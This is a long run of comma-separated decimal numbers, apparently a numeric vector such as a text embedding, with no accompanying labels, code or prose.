0.0032419878989458084, -0.03674650937318802, -0.040344737470149994, -0.0037634125910699368, -0.03279801085591316, -0.024168631061911583, 0.029072411358356476, -0.014209818094968796, 0.0043823556043207645, -0.007928839884698391, 0.007984564639627934, -0.024550743401050568, 0.022465044632554054, 0.020856987684965134, -0.020506717264652252, -0.02846739999949932, -0.004477883689105511, 0.01455212663859129, 0.0163193978369236, -0.031349167227745056, -0.018134433776140213, 0.03712862357497215, -0.0031365088652819395, 0.014002840034663677, 0.005329676903784275, -0.004073879215866327, -0.012609720230102539, -0.037255991250276566, 0.03195417672395706, 0.008565694093704224, 0.017895612865686417, 0.02650907076895237, 0.011391736567020416, 0.0028081305790692568, -0.029581895098090172, -0.028929119929671288, -0.005265991203486919, 0.009194588288664818, -0.02163713425397873, 0.011391736567020416, 0.019917625933885574, -0.02614288032054901, -0.006866088602691889, 0.00044977854122407734, 0.014265542849898338, 0.002784248674288392, 0.02467811480164528, 0.010006577707827091, -0.009369722567498684, -0.015149177983403206, -0.04967465624213219, 0.025107990950345993, 0.016574140638113022, 0.01005434151738882, -0.006997439544647932, -0.006722796242684126, 0.006030216813087463, -0.008454244583845139, -0.038816288113594055, -0.003667884273454547, 0.0221306961029768, -0.02314966358244419, 0.034390147775411606, 0.03410356119275093, 0.0031185972038656473, -0.01854838989675045, -0.005226187873631716, 0.008565694093704224, 0.00960854347795248, 0.015523330308496952, -0.00743129663169384, -0.030823761597275734, -0.033816978335380554, -0.024423373863101006, -0.03429462015628815, -0.01948774978518486, 0.02431192249059677, -0.004732625558972359, -0.036364395171403885, 0.0028399734292179346, -0.019376300275325775, 0.0024717918131500483, -0.010285201482474804, 0.005078915040940046, 0.0008751775021664798, -0.010723038576543331, 0.0034808083437383175, 0.04104527831077576, -0.010850409977138042, 0.020634088665246964, -0.0025792610831558704, -0.004282847046852112, -0.014424756169319153, -0.02806936576962471, -0.0038569504395127296, 0.0007806444191373885, -0.020076841115951538, 0.02396165393292904, -0.0096961110830307, -0.008836356922984123, -0.04292399808764458, -0.0047644684091210365, 0.011121072806417942, 0.02324519120156765, 0.006408349145203829, 0.010826528072357178, 0.007216358557343483, -0.04868753254413605, -0.006694933865219355, -0.012538074515759945, -0.0063446639105677605, 0.03907102718949318, 0.016956252977252007, -0.002145403763279319, 0.003456926206126809, -0.023340720683336258, 0.040790535509586334, 0.006698913872241974, 0.043242424726486206, 0.0036022088024765253, -0.022512808442115784, -0.004006213508546352, -0.02735290490090847, -0.019121559336781502, -0.01278485544025898, 0.01721099577844143, 0.017497578635811806, 0.008147758431732655, 0.007646235171705484, -0.002941471990197897, 0.027926072478294373, 0.005381421186029911, -0.013310261070728302, 0.01361276675015688, 0.015618858858942986, 0.009457290172576904, 0.003540513338521123, 0.00893984641879797, 0.00462515652179718, 0.03276616707444191, 0.016701512038707733, 0.013891390524804592, 0.00020075845532119274, -0.011391736567020416, 0.003578326664865017, -0.04470719024538994, 0.014201857149600983, 0.02181226946413517, -0.022273989394307137, 0.023531775921583176, 0.008844317868351936, -0.007256161887198687, 0.00517444359138608, 0.015738269314169884, -0.009847363457083702, -0.018038906157016754, 0.005695868283510208, -0.025824453681707382, 0.0013433651765808463, -0.05668005719780922, -0.026700127869844437, 0.0006677022320218384, 0.05015229806303978, -0.01043645478785038, -0.006862108130007982, 0.013246575370430946, -0.017577186226844788, -0.014926278963685036, -0.014576009474694729, 0.01503772847354412, -0.004227122291922569, -0.02265610173344612, 0.018755367025732994, -0.01783192902803421, 0.01869168132543564, 0.007096948102116585, 0.006491936277598143, 0.002919580088928342, -0.009727953933179379, -0.04859200492501259, -0.010945937596261501, 0.009775717742741108, -0.004063928034156561, -0.009051295928657055, -0.008454244583845139, -0.01510937511920929, -0.01128824707120657, -0.030362041667103767, -0.006639209110289812, -0.0010448395041748881, -0.0031603907700628042, 0.020458953455090523, 0.00041768705705180764, -0.007829330861568451, 0.008756750263273716, 0.003504690248519182, -0.003058892209082842, 0.002422037534415722, 0.01445659901946783, -0.010953898541629314, 0.00005525832966668531, -0.001089618424884975, -0.006679012440145016, -0.019774334505200386, 0.0027663370128721, 0.0359504409134388, -0.02104804292321205, 0.004266925621777773, -0.01323065347969532, -0.03610965609550476, -0.020665930584073067, -0.021016201004385948, -0.015563134104013443, -0.014480480924248695, -0.0041952794417738914, -0.016653746366500854, -0.010937977582216263, -0.02779870294034481, 0.017402051016688347, 0.004171397536993027, 0.02010868303477764, 0.005202305968850851, -0.009226430207490921, -0.005134639795869589, -0.011001662351191044, 0.018516546115279198, -0.00602225586771965, 0.00900353118777275, -0.012546035461127758, 0.0001084020987036638, 0.0014000849332660437, -0.003478818107396364, -0.019344458356499672, -0.0016777138225734234, -0.019201165065169334, 0.0010458346223458648, 0.007085007149726152, -0.006790461950004101, 0.0016667678719386458, 0.006933754310011864, 0.01510937511920929, 0.025808531790971756, -0.005807317793369293, 0.007662156596779823, -0.00933788064867258, -0.009481172077357769, 0.014806868508458138, -0.02646130695939064, 0.006121764425188303, -0.0024100965820252895, 0.0213187076151371, 0.02841963618993759, 0.0005139615386724472, 0.012633603066205978, 0.02324519120156765, 0.019010109826922417, 0.0037255992647260427, -0.01043645478785038, -0.0177045576274395, 0.0017254778649657965, 0.002778278198093176, 0.010110066272318363, -0.01229129359126091, -0.011495225131511688, -0.004065918270498514, 0.007053164299577475, 0.016701512038707733, -0.015714386478066444, -0.012036551721394062, 0.007769625633955002, -0.02195556089282036, 0.001685674418695271, 0.001685674418695271, 0.007566628511995077, 0.0006741702673025429, -0.012275371700525284, 0.016414927318692207, 0.026158802211284637, -0.03150837868452072, 0.0037932649720460176, 0.002242922317236662, 0.018070748075842857, -0.003011127933859825, 0.013875468634068966, 0.014249620959162712, 0.0021354530472308397, 0.004565451294183731, 0.011367853730916977, 0.03544095531105995, 0.010460336692631245, -0.016574140638113022, -0.017465736716985703, 0.00439031608402729, 0.027193689718842506, -0.0011085249716416001, -0.02445521578192711, 0.003562405239790678, 0.008151738904416561, -0.02310189977288246, -0.02851516380906105, 0.02208293229341507, -0.0177045576274395, -0.0005667010555043817, 0.004963485524058342, 0.03249550610780716, -0.01936037838459015, -0.03353039175271988, 0.014408835209906101, -0.022894922643899918, 0.010611589066684246, -0.002145403763279319, 0.010285201482474804, 0.010181712917983532, 0.028753984719514847, -0.013859547674655914, -0.001707566319964826, 0.008350756019353867, -0.021255021914839745, -0.02864253520965576, 0.01110515184700489, 0.02431192249059677, -0.00449380511417985, 0.006647169589996338, -0.0003383290022611618, 0.018930502235889435, 0.0014418786158785224, 0.010675274766981602, 0.045216675847768784, 0.018214041367173195, -0.027209611609578133, 0.0036778352223336697, -0.004605254624038935, -0.014345149509608746, -0.03208154812455177, 0.00878063216805458, 0.0012737091165035963, 0.004008203279227018, 0.00235835206694901, -0.034804102033376694, -0.0076541961170732975, 0.00009049056825460866, -0.017019938677549362, -0.028037521988153458, -0.013939154334366322, 0.013222693465650082, 0.026270251721143723, -0.017895612865686417, 0.04021736606955528, -0.005668005906045437, 0.000788605073466897, 0.021748583763837814, -0.01639900542795658, 0.019822098314762115, 0.01644676923751831, -0.01805482804775238, 0.012864462099969387, 0.0070690857246518135, 0.025553788989782333, 0.009815521538257599, -0.022194381803274155, 0.030807839706540108, -0.0005602330202236772, 0.02490101382136345, 0.028769904747605324, -0.012466427870094776, -0.008131836540997028, 0.017991142347455025, 0.02252873033285141, -0.0037017171271145344, 0.0004943085950799286, -0.00584314065054059, -0.025092070922255516, 0.0006020265864208341, 0.017991142347455025, -0.029741108417510986, 0.006452132947742939, 0.02146199904382229, -0.012299253605306149, -0.004919701721519232, -0.0049435836263000965, 0.03588675707578659, 0.012577878311276436, 0.0015563133638352156, 0.024646272882819176, 0.01983802020549774, 0.029311232268810272, -0.024502979591488838, -0.02146199904382229, -0.031349167227745056, 0.009712032042443752, -0.0033952309750020504, -0.001704581081867218, 0.02096843719482422, 0.00016754747775848955, -0.018182197585701942, -0.0028976884204894304, 0.025824453681707382, 0.005433165468275547, -0.0017065712017938495, 0.0005229173111729324, -0.0017244827467948198, -0.011320089921355247, -0.006663091015070677, 0.002073757816106081, -0.014209818094968796, 0.0072720833122730255, -0.021923718973994255, -0.05152153596282005, 0.007045203819870949, -0.0001289879292016849, 0.009449330158531666, 0.017051780596375465, -0.008028347976505756, -0.01264952402561903, -0.0004661974380724132, 0.007009380497038364, 0.0017105515580624342, 0.0046132151037454605, 0.02114357240498066, -0.0016548268031328917, -0.008677143603563309, 0.0006731752073392272, -0.0015334264608100057, 0.012243528850376606, -0.02727329730987549, -0.00688200956210494, 0.009234391152858734, 0.011001662351191044, -0.016972174867987633, 0.017545344308018684, -0.0019105636747553945, 0.007025301922112703, -0.020443031564354897, 0.047445666044950485, 0.005859062075614929, 0.00010230720363324508, -0.0014269523089751601, -0.003642012132331729, -0.02435968816280365, 0.018484704196453094, -0.015993010252714157, -0.0032678600400686264, -0.015013846568763256, 0.013978958129882812, 0.004879898391664028, 0.03397618979215622, -0.014225739054381847, -0.009584661573171616, 0.023356640711426735, -0.036364395171403885, 0.006527759600430727, -0.005727710667997599, 0.008374637924134731, 0.0030290395952761173, 0.02552194707095623, 0.002794199390336871, -0.0047803898341953754, 0.0029971967451274395, -0.009727953933179379, -0.006265056785196066, -0.01738612912595272, 0.007682058494538069, 0.01891458034515381, -0.007057144772261381, -0.0004119653021916747, -0.013843626715242863, -0.007534785661846399, 0.006149626802653074, 0.031221795827150345, -0.0013742127921432257, -0.0035643954761326313, 0.001778217381797731, 0.01671743206679821, -0.023563619703054428, -0.010874291881918907, -0.018739445134997368, -0.005600339733064175, 0.016231831163167953, -0.023611383512616158, 0.026333937421441078, -0.010898173786699772, 0.002571300370618701, 0.0008209453662857413, -0.02498062141239643, 0.011542988941073418, -0.009154784493148327, 0.011391736567020416, -0.01629551686346531, -0.0044500213116407394, -0.03160391002893448, -0.0365554541349411, 0.03252734616398811, -0.02977295219898224, -0.008223384618759155, 0.015993010252714157, -0.00017762271454557776, -0.036237023770809174, -0.0017831928562372923, 0.0040261149406433105, 0.010428493842482567, 0.017736399546265602, -0.02730513922870159, -0.02905648946762085, -0.015348195098340511, 0.01472726184874773, -0.0021593349520117044, -0.01582583598792553, 0.017465736716985703, 0.01237886119633913, -0.011853455565869808, 0.017800085246562958, 0.008044268935918808, 0.025601554661989212, -0.008645300753414631, 0.014942200854420662, -0.00040027304203249514, 0.02646130695939064, 0.012187804095447063, 0.002195158042013645, 0.025314969941973686, 0.001593131572008133, -0.005082895513623953, 0.01401080098003149, -0.0026051332242786884, 0.0032181057613343, 0.000058119199820794165, -0.002207099227234721, -0.020634088665246964, 0.020618166774511337, 0.023882046341896057, -0.028483320027589798, -0.023085977882146835, 0.004756507463753223, -0.015881560742855072, -0.010396650992333889, 0.01502180751413107, 0.008060190826654434, -0.03173127770423889, -0.002985255792737007, 0.003986311610788107, -0.008318913169205189, -0.004927662201225758, 0.008462205529212952, 0.014305345714092255, -0.011144954711198807, 0.0032618895638734102, -0.0035285723861306906, 0.001853843918070197, -0.019631043076515198, 0.008788593113422394, 0.01436903141438961, 0.0034111524000763893, 0.01432922761887312, 0.0019195195054635406, -0.022146617993712425, -0.03563201427459717, -0.0022250106558203697, -0.01662190444767475, 0.011136994697153568, -0.04362453892827034, 0.00412363326177001, 0.001500588608905673, -0.0030091379303485155, 0.019822098314762115, 0.0009612523717805743, -0.026126958429813385, 0.0029812755528837442, 0.012673405930399895, -0.02435968816280365, -0.006722796242684126, -0.003552454523742199, -0.016255712136626244, 0.028706220909953117, 0.0161999873816967, 0.003450955729931593, 0.0032897519413381815, 0.026891184970736504, 0.021175414323806763, -0.014424756169319153, 0.024471137672662735, 0.0005637158174067736, -0.0048162126913666725, 0.0008020387031137943, 0.005277932155877352, 0.0018588192760944366, 0.005731691140681505, 0.004083829931914806, 0.01629551686346531, 0.011654438450932503, -0.02463035099208355, -0.009895128197968006, 0.0048162126913666725, -0.0010796674760058522, 0.015085493214428425, -0.01570642553269863, -0.002678769640624523, -0.01533227413892746, 0.005293853580951691, 0.02677973546087742, 0.0039743706583976746, 0.0009677204070612788, -0.005703828763216734, -0.002617074176669121, -0.007053164299577475, 0.021780425682663918, 0.003886803053319454, -0.014424756169319153, -0.0057078092359006405, -0.014679498039186, 0.02238543890416622, 0.02252873033285141, -0.012235568836331367, 0.014488441869616508, -0.012012669816613197, -0.02494877763092518, 0.00434653228148818, -0.02216253988444805, -0.02569708228111267, 0.003391250502318144, 0.016924411058425903, -0.02329295687377453, -0.002756386296823621, 0.009481172077357769, 0.02373875491321087, -0.019694726914167404, -0.024821406230330467, -0.016574140638113022, -0.000455749046523124, -0.021971482783555984, 0.01597708836197853, -0.0055048116482794285, -0.004183338489383459, -0.006129725370556116, 0.0015573084820061922, -0.016040774062275887, -0.003922626376152039, 0.0063964081928133965, 0.04785962030291557, 0.027321061119437218, 0.027910152450203896, 0.010667313821613789, -0.018261805176734924, 0.009282155893743038, -0.013970997184515, -0.04008999466896057, 0.022640179842710495, 0.03061678446829319, -0.02584037370979786, 0.03684203699231148, -0.034708574414253235, -0.0038788423407822847, 0.016653746366500854, -0.021032122895121574, -0.0067625995725393295, 0.0014886475400999188, -0.020220132544636726, -0.01958327740430832, 0.011081269942224026, -0.010555864311754704, 0.007303925696760416, 0.011972866021096706, 0.0013662520796060562, -0.007200437132269144, -0.006858127657324076, -0.009584661573171616, 0.0023304896894842386, 0.015618858858942986, -0.030823761597275734, -0.019026029855012894, 0.002007086994126439, -0.005011249333620071, -0.005178423598408699, 0.015499448403716087, -0.009616504423320293, -0.0008771676803007722, 0.0036937566474080086, 0.01264952402561903, -0.010269279591739178, 0.004243043716996908, 0.02391389012336731, -0.005719750188291073, 0.025092070922255516, -0.011113112792372704, 0.004139554686844349, 0.0006035192054696381, 0.006862108130007982, -0.03133324533700943, -0.005922747775912285, 0.025760767981410027, 0.01711546629667282, -0.009767756797373295, -0.005763533990830183, -0.012100236490368843, 0.008287070319056511, -0.004135574214160442, -0.012506231665611267, 0.0015304411062970757, 0.006149626802653074, -0.008231345564126968, -0.0009164735092781484, 0.0252035204321146, -0.022990450263023376, 0.006233213935047388, -0.0008015412022359669, -0.0014647655189037323, -0.0003428068885114044, -0.020888829603791237, 0.005317735485732555, -0.006599405314773321, 0.013079401105642319, 0.002489703241735697, -0.021446077153086662, 0.003212135285139084, -0.00015486014308407903, -0.015945246443152428, -0.006694933865219355, 0.024598507210612297, -0.00878063216805458, -0.014830751344561577, -0.0006806383025832474, -0.012975911609828472, -0.0005224197520874441, 0.006969577167183161, -0.012585838325321674, 0.015276549383997917, -0.007228299509733915, 0.035154372453689575, 0.016924411058425903, 0.005202305968850851, -0.00005003413025406189, -0.013310261070728302, -0.008068151772022247, 0.017720477655529976, -0.002322528976947069, 0.004565451294183731, 0.0027265336830168962, -0.031349167227745056, -0.003936557564884424, -0.031444694846868515, 0.008310952223837376, 0.014997925609350204, 0.03259103372693062, -0.017672713845968246, -0.0041276137344539165, -0.001328438869677484, -0.0008070141775533557, -0.003212135285139084, 0.01097778044641018, -0.005433165468275547, 0.01233905740082264, 0.009409526363015175, 0.0011672350810840726, -0.006794442422688007, -0.0064720348455011845, -0.022544652223587036, 0.008255227468907833, 0.009122941642999649, 0.0034211031161248684, 0.0012796797091141343, 0.015411880798637867, -0.017736399546265602, 0.029343074187636375, 0.006746678147464991, 0.0033474669326096773, -0.015809914097189903, 0.004899799823760986, -0.019965391606092453, -0.004955524578690529, 0.01600097119808197, -0.013310261070728302, 0.0006333717610687017, -0.009513014927506447, -0.0006900916341692209, 0.013819743879139423, 0.015738269314169884, 0.005600339733064175, -0.004565451294183731, 0.0010378739098086953, -0.011797730810940266, -0.02109580859541893, 0.008183581754565239, 0.01533227413892746, 0.00594662968069315, -0.026477228850126266, 0.02386612445116043, 0.012609720230102539, 0.015722347423434258, -0.009887167252600193, 0.009528936818242073, -0.0077815670520067215, 0.029088333249092102, -0.017593108117580414, 0.002336460165679455, 0.022815315052866936, 0.013055519200861454, 0.016032813116908073, -0.016279594972729683, -0.006917832884937525, 0.010309083387255669, 0.005281912628561258, 0.01810259185731411, 0.02270386554300785, -0.011710163205862045, 0.00784127227962017, 0.011479304172098637, 0.0021931680385023355, 0.01153502892702818, -0.015857679769396782, -0.001232910668477416, 0.03531358763575554, 0.02467811480164528, -0.001650846446864307, 0.006026236340403557, 0.013493356294929981, -0.01128824707120657, 0.00014565560559276491, -0.01827772706747055, -0.005982452537864447, 0.02569708228111267, 0.012609720230102539, 0.009242352098226547, 0.006766580045223236, -0.006205351557582617, -0.013047558255493641, 0.005238128826022148, 0.017688635736703873, 0.003319604555144906, -0.01124048326164484, 0.014782986603677273, -0.004402257036417723, -0.014806868508458138, 0.004696802701801062, 0.0018249864224344492, 0.023229271173477173, 0.019233008846640587, -0.00647999532520771, 0.01220372598618269, -0.006981518119573593, -0.009138863533735275, 0.01580195501446724, 0.001564274076372385, -0.01943998597562313, 0.010723038576543331, 0.007439257577061653, -0.0034449852537363768, 0.039262086153030396, -0.0081596989184618, -0.0035763364285230637, 0.009099059738218784, 0.025856295600533485, -0.017624950036406517, -0.0007453188882209361, -0.02208293229341507, -0.015587016008794308, 0.02771909534931183, -0.037701789289712906, -0.009393605403602123, -0.007407414726912975, 0.0006288939039222896, 0.0002649414527695626, 0.0020220133010298014, -0.0027126024942845106, 0.00670289434492588, -0.015523330308496952, -0.011853455565869808, -0.01401080098003149, 0.001054790336638689, -0.005003288853913546, 0.007236259989440441, 0.005277932155877352, 0.009998616762459278, 0.0030449610203504562, 0.0014418786158785224, -0.012235568836331367, 0.002957393415272236, 0.01247438881546259, -0.011232522316277027, 0.009576700627803802, 0.02717776969075203, 0.0213187076151371, 0.010133948177099228, 0.0016289545455947518, 0.004919701721519232, 0.00566402543336153, -0.005950610153377056, -0.007419355679303408, -0.013493356294929981, -0.0026210546493530273, 0.025219440460205078, -0.009170705452561378, 0.018978266045451164, -0.0029235605616122484, 0.015125296078622341, -0.007184515707194805, -0.023897968232631683, 0.004418178461492062, 0.013286378234624863, -0.005560536403208971, -0.007853212766349316, 0.0039743706583976746, 0.005624222103506327, 0.013716255314648151, -0.016414927318692207, -0.007188496179878712, 0.015276549383997917, 0.015141217969357967, -0.01988578401505947, -0.0035066804848611355, -0.005437145940959454, -0.002507614903151989, -0.006770560052245855, -0.002412086818367243, -0.0000777410386945121, -0.017513500526547432, -0.04295584186911583, -0.012490310706198215, 0.013373945839703083, 0.005624222103506327, 0.003456926206126809, 0.007152672857046127, -0.008637339808046818, -0.02146199904382229, 0.021748583763837814, 0.0096961110830307, 0.008390558883547783, 0.005086875986307859, 0.006280978210270405, -0.0254741832613945, -0.004955524578690529, 0.01899418793618679, -0.018580231815576553, 0.005234148353338242, -0.001640895614400506, -0.00952097587287426, -0.0010617559310048819, -0.005262010730803013, 0.0008229355444200337, -0.024518901482224464, 0.03254326805472374, 0.00747508043423295, 0.01414613239467144, -0.0021294825710356236, -0.03142877295613289, -0.01168628130108118, 0.007562648039311171, -0.0077059403993189335, -0.002704641781747341, 0.0036300711799412966, 0.024646272882819176, 0.018166277557611465, 0.008494047448039055, 0.01409836858510971, -0.0027902191504836082, -0.000021736394046456553, -0.021828191354870796, 0.017768243327736855, -0.022067010402679443, -0.021302785724401474, -0.0110653480514884, 0.02359546162188053, 0.0049833869561553, -0.004879898391664028, 0.00489581935107708, -0.011248444207012653, 0.03197009861469269, -0.004155476111918688, 0.006603385787457228, 0.0019951460417360067, 0.009186627343297005, 0.008151738904416561, -0.005007269326597452, 0.0081596989184618, -0.012434585951268673, 0.011630556546151638, -0.016812961548566818, -0.006591444835066795, 0.0008393544121645391, 0.013891390524804592, -0.004262945149093866, 0.007530805189162493, 0.001759310718625784, -0.003908695187419653, -0.002209089230746031, 0.0030250591225922108, -0.007487021386623383, 0.006973557639867067, -0.011280287057161331, 0.0036718647461384535, -0.021557526662945747, -0.03451751917600632, 0.020856987684965134, 0.02806936576962471, 0.013294339179992676, -0.010046380572021008, -0.0005582428420893848, 0.021350549533963203, -0.01432922761887312, 0.014201857149600983, -0.014424756169319153, 0.012100236490368843, 0.003478818107396364, 0.00041146777221001685, 0.0049833869561553, 0.03056901879608631, -0.014225739054381847, -0.005890904925763607, 0.003594248089939356, 0.015252667479217052, -0.012530113570392132, 0.013779941014945507, -0.00439031608402729, -0.0015752200270071626, 0.005254050251096487, -0.009393605403602123, 0.002804150339215994, -0.0011761907953768969, 0.021971482783555984, -0.002380243968218565, 0.00965630728751421, -0.006030216813087463, -0.026938948780298233, 0.014130210503935814, -0.017688635736703873, 0.004935623146593571, 0.005098816938698292, -0.00639242772012949, 0.006372526288032532, 0.006603385787457228, -0.0014627753989771008, 0.007379552349448204, 0.03738336265087128, -0.020013155415654182, -0.0038987440057098866, 0.008060190826654434, -0.013023676350712776, -0.000599041348323226, -0.0006234209286049008, -0.006249135360121727, -0.008884121663868427, 0.004219161346554756, -0.015459644608199596, 0.00208370853215456, -0.005158522166311741, 0.004175378009676933, 0.003176312195137143, -0.011670360341668129, 0.0015384018188342452, -0.006197391077876091, 0.010221515782177448, -0.009576700627803802, 0.002666828455403447, 0.0016369152581319213, 0.018755367025732994, 0.013509277254343033, 0.007180535234510899, -0.01584971882402897, -0.003986311610788107, 0.0002614586555864662, -0.007168594282120466, -0.007136751431971788, 0.008052229881286621, -0.005433165468275547, -0.008517930284142494, -0.03620518371462822, -0.015770111232995987, 0.010547904297709465, -0.008892081677913666, -0.016032813116908073, -0.005914786830544472, 0.005496851168572903, 0.008239306509494781, -0.008900042623281479, -0.028945039957761765, 0.007992524653673172, -0.025904059410095215, 0.009107020683586597, -0.01182161271572113, -0.01405856478959322, 0.003775353543460369, 0.002835992956534028, 0.006464073900133371, 0.0030967053025960922, -0.00208370853215456, 0.008605497889220715, -0.013445592485368252, 0.0061257448978722095, 0.0026887203566730022, -0.011901220306754112, 0.0007965657860040665, -0.023038214072585106, -0.005779455415904522, 0.013883429579436779, -0.005465008318424225, 0.007494982331991196, -0.006495916750282049, 0.004875917918980122, -0.00943340826779604, -0.016972174867987633, 0.001669753110036254, 0.03071231208741665, 0.010086184367537498, -0.009536896832287312, -0.00716461380943656, 0.0012826649472117424, -0.002067787107080221, 0.0014398883795365691, 0.011614635586738586, 0.03330749273300171, 0.014074485749006271, -0.02843555621802807, 0.022146617993712425, 0.004163436591625214, 0.00042813544860109687, 0.02262425795197487, 0.019599199295043945, 0.01998131163418293, 0.011431539431214333, -0.02168489806354046, 0.019567357376217842, -0.016637826338410378, -0.012991833500564098, 0.007240240462124348, 0.005337637383490801, 0.021971482783555984, -0.0011831563897430897, 0.020044997334480286, -0.0009353801724500954, -0.013716255314648151, 0.0036937566474080086, 0.006117784418165684, 0.0034449852537363768, 0.010858370922505856, -0.01043645478785038, 0.002079728292301297, 0.005098816938698292, -0.011312128975987434, 0.013644609600305557, -0.015053650364279747, 0.024773642420768738, 0.017736399546265602, 0.011367853730916977, 0.015292470343410969, 0.014408835209906101, -0.008004466071724892, 0.018739445134997368, 0.02163713425397873, 0.020411189645528793, -0.033594079315662384, -0.0003368363541085273, -0.010030459612607956, 0.011121072806417942, -0.002374273492023349, 0.02302229218184948, -0.02297452837228775, -0.0024976639542728662, -0.0010065287351608276, -0.0065596019849181175, 0.0005303804646246135, 0.0073994542472064495, 0.023531775921583176, -0.012195765040814877, 0.005827219225466251, -0.006539700552821159, -0.007538766134530306, -0.006129725370556116, -0.003962429706007242, 0.017465736716985703, 0.001232910668477416, -0.014568048529326916, -0.015690505504608154, -0.013238614425063133, -0.03973972424864769, 0.0039067049510777, -0.002973314840346575, -0.00900353118777275, 0.006639209110289812, -0.0055048116482794285, 0.005839160177856684, -0.01760902814567089, -0.007065105251967907, -0.015451684594154358, 0.019344458356499672, 0.025633396580815315, -0.0016806990606710315, -0.008207463659346104, 0.0003206662368029356, -0.0040420363657176495, -0.0015951216919347644, 0.01151114609092474, 0.009624464437365532, 0.008812475018203259, 0.0019205146236345172, -0.020363425835967064, 0.0218600332736969, -0.00008881135727278888, -0.007610412314534187, 0.006543680559843779, -0.014201857149600983, 0.011749967001378536, 0.003986311610788107, 0.012036551721394062, -0.06209332123398781, -0.0007622353150509298, 0.014042643830180168, -0.018755367025732994, -0.012673405930399895, -0.008756750263273716, 0.016287555918097496, 0.01119271945208311, -0.006730756722390652, -0.030457569286227226, -0.001038869027979672, -0.00458137271925807, 0.008040289394557476, 0.010141909122467041, 0.014480480924248695, 0.00008383593376493081, 0.0030608822125941515, -0.004235082771629095, 0.013676452450454235, -0.0007572598988190293, -0.025983667001128197, -0.008414440788328648, 0.012354978360235691, 0.004485844634473324, -0.007407414726912975, 0.031189952045679092, -0.001968278782442212, -0.010317044332623482, 0.003303683130070567, 0.008478126488626003, -0.02332479879260063, -0.011049427092075348, 0.00947321206331253, -0.01220372598618269, -0.012840580195188522, 0.0013373945839703083, -0.003679825458675623, -0.018707603216171265, -0.01211615838110447, -0.008310952223837376, -0.0008358716149814427, -0.0031663612462580204, 0.00947321206331253, 0.0076303137466311455, -0.0036141497548669577, 0.01639900542795658, 0.013039597310125828, -0.0024717918131500483, 0.006675031967461109, -0.005194345023483038, -0.0017095565563067794, 0.003249948611482978, -0.021875955164432526, 0.015809914097189903, -0.0035544445272535086, 0.0004271403595339507, 0.001813045353628695, 0.01541984174400568, 0.00007942024240037426, 0.01654229685664177, -0.01283261924982071, -0.008963728323578835, 0.00744323804974556, -0.0049953279085457325, -0.016605982556939125, -0.025490105152130127, -0.013039597310125828, 0.0359504409134388, -0.004633117001503706, 0.010157830081880093, -0.005568497348576784, -0.015165099874138832, 0.015610897913575172, 0.011742006056010723, 0.004366434179246426, 0.0028539046179503202, 0.007857193239033222, 0.009218470193445683, -0.014384952373802662, -0.025219440460205078, 0.005751593038439751, 0.010030459612607956, 0.010221515782177448, 0.003733559977263212, -0.030648626387119293, 0.01539595890790224, -0.023308876901865005, 0.0046888417564332485, -0.004497785586863756, -0.01676519587635994, -0.015077532269060612, -0.025888139382004738, 0.005138620268553495, 0.029693344607949257, 0.004239063244313002, -0.02042710967361927, 0.013716255314648151, -0.00028061404009349644, -0.004736606031656265, 0.0031046660151332617, 0.01612834259867668, -0.015563134104013443, 0.008008446544408798, -0.001784187857992947, 0.01032500434666872, -0.0043823556043207645, 0.012490310706198215, 0.0260155089199543, 0.00226879445835948, -0.007077046670019627, -0.014878515154123306, -0.0004298768471926451, -0.030027693137526512, 0.0001819762255763635, 0.02878582663834095, 0.00030897397664375603, 0.004752527456730604, -0.009329919703304768, 0.008764711208641529, -0.00043659366201609373, 0.012394782155752182, 0.00453758891671896, 0.02561747469007969, -0.01765679381787777, -0.009083138778805733, 0.018659839406609535, 0.0027364843990653753, -0.010699156671762466, -0.007435277104377747, -0.006093902047723532, 0.0011552940122783184, 0.008358716033399105, -0.008804514072835445, -0.016924411058425903, 0.015881560742855072, -0.01519694272428751, -0.024487057700753212, -0.004724665079265833, -0.005289873108267784, -0.0003741520631592721, -0.010149870067834854, -0.012148001231253147, 0.030457569286227226, -0.00037962503847666085, 0.0025195558555424213, 0.000927419459912926, 0.0009105030330829322, -0.01711546629667282, 0.010547904297709465, -0.021668976172804832, -0.002487713238224387, 0.012370900250971317, -0.021398313343524933, -0.007948741316795349, -0.02195556089282036, -0.011710163205862045, 0.0015055639669299126, -0.007805448956787586, -0.0014995934907346964, -0.00060053396737203, 0.006149626802653074, -0.0019254899816587567, 0.0017891633324325085, -0.006977538112550974, -0.007737783249467611, 0.004549529869109392, -0.0060899220407009125, 0.01012598816305399, 0.005305794533342123, 0.01936037838459015, 0.0013622717233374715, -0.01063547097146511, -0.014201857149600983, -0.018707603216171265, 0.008028347976505756, -0.011606674641370773, 0.035027001053094864, 0.013270457275211811, 0.007005400490015745, -0.010730999521911144, -0.013795861974358559, -0.01926485076546669, -0.015969129279255867, -0.01472726184874773, 0.0137003343552351, 0.014432717114686966, -0.016701512038707733, -0.00001859565600170754, -0.01889866031706333, 0.009576700627803802, 0.012577878311276436, 0.02230583131313324, 0.02534681186079979, -0.012721169739961624, -0.021828191354870796, -0.006587464362382889, -0.008509969338774681, 0.010611589066684246, 0.015340234152972698, -0.02685934118926525, 0.00027489231433719397, -0.01998131163418293, -0.0005532674258574843, -0.018214041367173195, -0.0021653056610375643, -0.009584661573171616, -0.02052263915538788, -0.006543680559843779, -0.017847849056124687, -0.012538074515759945, 0.0006681997328996658, -0.015165099874138832, 0.0015811905032023787, -0.02542641945183277, -0.006245155353099108, -0.00517444359138608, 0.013588884845376015, -0.009242352098226547, -0.006149626802653074, -0.018739445134997368, -0.009552818723022938, -0.002660857979208231, 0.00787709467113018, 0.02404125966131687, -0.015786033123731613, 0.008048249408602715, -0.0051983254961669445, -0.00847016554325819, -0.00393854733556509, -0.0003475335252005607, -0.008669182658195496, 0.01340578868985176, 0.00548491021618247, 0.0059983739629387856, 0.01904195174574852, -0.000834876555018127, 0.014408835209906101, 0.0013622717233374715, -0.004187318962067366, 0.006265056785196066, 0.002443929435685277, -0.008271148428320885, 0.001229925430379808, 0.01975841261446476, -0.006933754310011864, 0.02314966358244419, 0.013461513444781303, 0.03217707574367523, 0.0008552757790312171, -0.0110653480514884, 0.00032116376678459346, -0.010149870067834854, -0.0359504409134388, -0.005023190286010504, 0.0029653541278094053, -0.003954468760639429, 0.005807317793369293, -0.011630556546151638, -0.02119133621454239, -0.02606327272951603, -0.005413264036178589, 0.007713900879025459, -0.005668005906045437, -0.0013145076809450984, 0.009449330158531666, 0.004014173988252878, 0.018038906157016754, -0.00013943632075097412, 0.008669182658195496, 0.0003604696539696306, -0.007415375672280788, 0.008326873183250427, -0.010555864311754704, 0.009513014927506447, 